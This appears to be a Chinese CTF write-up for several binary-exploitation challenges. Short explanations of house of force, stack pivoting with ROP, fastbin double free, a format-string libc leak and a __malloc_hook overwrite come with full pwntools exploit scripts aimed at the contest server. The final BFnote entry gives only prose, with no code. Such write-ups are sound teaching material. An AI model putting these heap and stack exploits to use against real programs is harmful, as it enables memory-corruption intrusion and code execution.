force 标准的house of force,先申请较大的内存页,可泄露出libc基址,
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 from pwn import * context.log_level = 'debug' offset = 0x4ff010#0x4aa010#0x4ec010# while True: warn(hex(offset)) try: p = process('./pwn') #p = remote('123.56.85.29',7147) def add(size,content): p.sendlineafter('1:','1') p.sendlineafter('size',str(size)) p.recvuntil('addr ') addr = int(p.recvuntil('\n',drop = True),16) p.sendafter('content',content) return addr chunk1 = add(0x100000,'aaaa') info(hex(chunk1)) libc = chunk1 - offset info(hex(libc)) chunk2 = add(0x28,'\xff'*0x30)+0x20 info(hex(chunk2)) mallochook = libc+0x3c4b10 chunk3 = add(mallochook-chunk2-0x20,'bbbb') chunk4 = add(0x20,p64(libc+0x45390)*4) #gdb.attach(p) #pause() p.sendlineafter('1:','1') p.sendafter('size',str(libc+0x18cd57)) print(p.recv()) p.interactive() except Exception as e: offset-=0x1000 p.close() pass
BorrowStack 栈溢出0x10字节,栈迁移到bss段后,构造rop链。
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 from pwn import * import sys context.log_level = 'debug' def pwn(): offest=152 #while (1): try: if sys.argv[1]=="l": p=process('./pwn') libc=ELF('/lib/x86_64-linux-gnu/libc.so.6') else: p=remote('123.56.85.29',3635) libc=ELF('/lib/x86_64-linux-gnu/libc.so.6') elf=ELF('./pwn') bss_addr=0x601080 p.recvuntil('\n') #gdb.attach(p, "b *0x400680") payload='a'*0x60+p64(bss_addr+offest)+p64(0x400699) p.send(payload) p.recvuntil('\n') payload = 'b'*offest+p64(bss_addr+offest)+p64(0x400703)+p64(elf.got["read"])+p64(elf.sym["puts"])+p64(0x400626) p.send(payload) leak=u64(p.recv(6).ljust(8,'\x00')) libc_addr=leak-libc.sym["read"] p.recvuntil('Tell me what you want\n') payload='a'*0x60+p64(0)+p64(libc_addr+0x4526a) p.send(payload) p.recvuntil('\n') payload='b'*0x10 p.send(payload) print offest pause() p.interactive() #p.close() except: offest=offest+1 pwn()
Some_thing_exceting flag已经被写到bss段内,用double free漏洞申请堆块到bss段,然后输出堆块内容即可。
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 from pwn import * import sys context.log_level = 'debug' if sys.argv[1]=="l": p=process('./excited') libc=ELF('/lib/x86_64-linux-gnu/libc.so.6') else: p=remote('123.56.85.29',6484) libc=ELF('/lib/x86_64-linux-gnu/libc.so.6') e=ELF('./excited') def show(index): p.recvuntil('to do :') p.sendline('4') p.recvuntil(': ') p.sendline(str(index)) def new(lenght,cont,lenght2,cont2): p.recvuntil('to do :') p.sendline('1') p.recvuntil(': ') p.sendline(str(lenght)) p.recvuntil(': ') p.sendline(cont) p.recvuntil(': ') p.sendline(str(lenght2)) p.recvuntil(': ') p.sendline(cont2) def delete(num): p.recvuntil('to do :') p.sendline('3') p.recvuntil(': ') p.sendline(str(num)) new(0x60,'a'*0x8,0x50,'\x10'*0x8) new(0x60,'b'*0x8,0x50,'\x11'*0x8) new(0x60,'c'*0x8,0x50,'\x12'*0x8) delete(0) delete(1) delete(0) bss_addr=0x6020A8 new(0x50,p64(bss_addr-0x10),0x50,'\x14'*4) new(0x50,'\x16'*4,0x50,'\x17'*1) show(1) print p.recv() p.interactive()
Some_thing_interesting 格式化字符漏洞泄露libc基址,然后double free修改malloc_hook为onegadget
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 from pwn import * import sys context.log_level = 'debug' if sys.argv[1]=="l": p=process('./interested') libc=ELF('/lib/x86_64-linux-gnu/libc.so.6') else: p=remote('123.56.85.29',3041) libc=ELF('/lib/x86_64-linux-gnu/libc.so.6') e=ELF('./interested') def show(index): p.recvuntil('to do :') p.sendline('4') p.recvuntil(': ') p.sendline(str(index)) def new(lenght,cont,lenght2,cont2): p.recvuntil('to do :') p.sendline('1') p.recvuntil(': ') p.sendline(str(lenght)) p.recvuntil(': ') p.sendline(cont) p.recvuntil(': ') p.sendline(str(lenght2)) p.recvuntil(': ') p.sendline(cont2) def edit(index,cont,cont2): p.recvuntil('to do :') p.sendline('2') p.recvuntil(': ') p.sendline(str(index)) p.recvuntil(': ') p.sendline(cont) p.recvuntil(': ') p.sendline(cont2) def check(): p.recvuntil('to do :') p.sendline('0') #info(p.recv(49)) #leak=int(p.recv(12),16) p.recvline() leak=int(p.recvline()[31:43],16) print hex(leak) pause() return leak def delete(num): p.recvuntil('to do :') p.sendline('3') p.recvuntil(': ') p.sendline(str(num)) p.recvuntil(":") p.send('OreOOrereOOreO%17$p') libc_addr=check()-0x20830 new(0x40,'a'*0x8,0x60,'\x10'*0x8) #1 new(0x40,'b'*0x8,0x60,'\x11'*0x8) #2 new(0x40,'c'*0x8,0x60,'\x12'*0x8) #3 delete(1) delete(2) delete(1) new(0x60,p64(libc_addr+libc.sym["__malloc_hook"]-0x23),0x60,'\x14'*4) new(0x60,'\x16'*4,0x60,'\x1f'*0x13+p64(libc_addr+0xf1147)) #gdb.attach(p) pause() p.recvuntil('to do :') p.sendline('1') p.recvuntil(': ') p.sendline(str(0x60)) p.interactive()
BFnote 一个栈溢出,然后在bss上写值,申请任意大小的chunk,以chunk为基址进行任意偏移写
栈溢出被canary拦住了,预期解是通过申请很大的chunk,会mmap到libc附近地址,接着通过偏移改写TLS中的canary,接着就是常规ROP的操作了,可以ret2dlresolve,也可以爆破1/4096直接改写got表为system,调用即可。还看到了另一位师傅的wp,使用mprotect改bss可执行,写入shellcode就行了
exp 
